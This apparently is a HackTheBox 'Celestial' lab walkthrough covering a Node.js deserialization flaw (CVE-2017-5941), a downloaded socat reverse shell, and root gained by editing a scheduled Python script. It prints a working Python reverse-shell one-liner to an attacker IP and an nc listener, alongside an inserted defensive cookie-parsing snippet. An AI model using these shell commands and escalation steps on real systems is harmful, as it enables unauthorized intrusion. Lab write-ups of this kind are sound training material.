Celestial (10.10.10.85) HackTheBox
Let’s start with a quick NMAP scan to discover open ports.
NMAP scan results: port 3000 is open with a Node.js server running on it. Browsing to http://10.10.10.85:3000
I start Burp Suite and capture the request while using Burp as a proxy.
Decode the base64 profile cookie: {"username":"Dummy","country":"Idk Probably Somewhere Dumb","city":"Lametown","num":"2"}
After some googling for "NodeJS" vulnerabilities, you will come across the following article on CVE-2017-5941, a Node.js deserialization vulnerability (link here: https://www.exploit-db.com/docs/english/41289-exploiting-node.js-deserialization-bug-for-remote-code-execution.pdf)
I tried to exploit it but failed… :((
So we use another way to attack.
We use the child_process module, which lets us spawn a new process; in this case we execute the ping command with exec().
=)) it works
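The cookie handling that CVE-2017-5941 abuses is a server passing the base64 profile straight to node-serialize's unserialize(), which runs any value carrying its function marker. As an added defender-side example (not code from the box or the writeup), the check below decodes the same profile cookie format seen above, refuses anything carrying the node-serialize marker, and otherwise parses it with JSON.parse against an assumed schema; the schema keys are taken from the cookie on the box, the function names are my own.

```javascript
// Defender-side replacement for unserialize(cookie): decode, screen, JSON.parse, validate.
// node-serialize tags serialized functions with this prefix; its presence in an
// inbound cookie is an exploitation attempt, never legitimate profile data.
const ND_FUNC_MARKER = '_$$ND_FUNC$$_';

// Allowed keys and their expected types (assumed from the cookie observed on the box).
const PROFILE_SCHEMA = { username: 'string', country: 'string', city: 'string', num: 'string' };

// Returns a verdict object instead of throwing so the caller can log the reason.
function parseProfileCookie(cookieValue) {
  let json;
  try {
    json = Buffer.from(cookieValue, 'base64').toString('utf8');
  } catch (e) {
    return { ok: false, reason: 'bad-base64' }; // non-string input
  }
  if (json.includes(ND_FUNC_MARKER)) {
    return { ok: false, reason: 'nd-func-marker' }; // alert-worthy
  }
  let obj;
  try {
    obj = JSON.parse(json); // never unserialize() untrusted input
  } catch (e) {
    return { ok: false, reason: 'bad-json' };
  }
  if (obj === null || typeof obj !== 'object' || Array.isArray(obj)) {
    return { ok: false, reason: 'not-object' };
  }
  for (const key of Object.keys(obj)) {
    // hasOwnProperty, not `in`: `in` would accept keys such as "constructor" via the prototype chain.
    if (!Object.prototype.hasOwnProperty.call(PROFILE_SCHEMA, key)) {
      return { ok: false, reason: `unexpected-key:${key}` };
    }
    if (typeof obj[key] !== PROFILE_SCHEMA[key]) {
      return { ok: false, reason: `bad-type:${key}` };
    }
  }
  return { ok: true, profile: obj };
}

// Constructed samples: the benign cookie from the box and one carrying the marker.
const BENIGN = Buffer.from(JSON.stringify(
  { username: 'Dummy', country: 'Idk Probably Somewhere Dumb', city: 'Lametown', num: '2' }
)).toString('base64');
const SUSPICIOUS = Buffer.from(`{"username":"${ND_FUNC_MARKER}function(){}()"}`).toString('base64');

module.exports = { parseProfileCookie, BENIGN, SUSPICIOUS, ND_FUNC_MARKER };
```

Logging the `nd-func-marker` verdict gives a simple detection signal for attempts against this endpoint.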
We need to upload a shell file to the remote server… My usual way to do this is to use SimpleHTTPServer.
Next step: the following payload will download and execute a socat reverse shell.
Getting a shell
So easy, cat user.txt
2. Privilege Escalation
We can use a command to download LinEnum.sh to the remote server.
We can see a Python file, script.py.
We can modify script.py. I added the following content:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.3",12345));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
We listen for the reverse shell with: $ nc -v -n -l -p 1234
So easy =)) we can see the file root.txt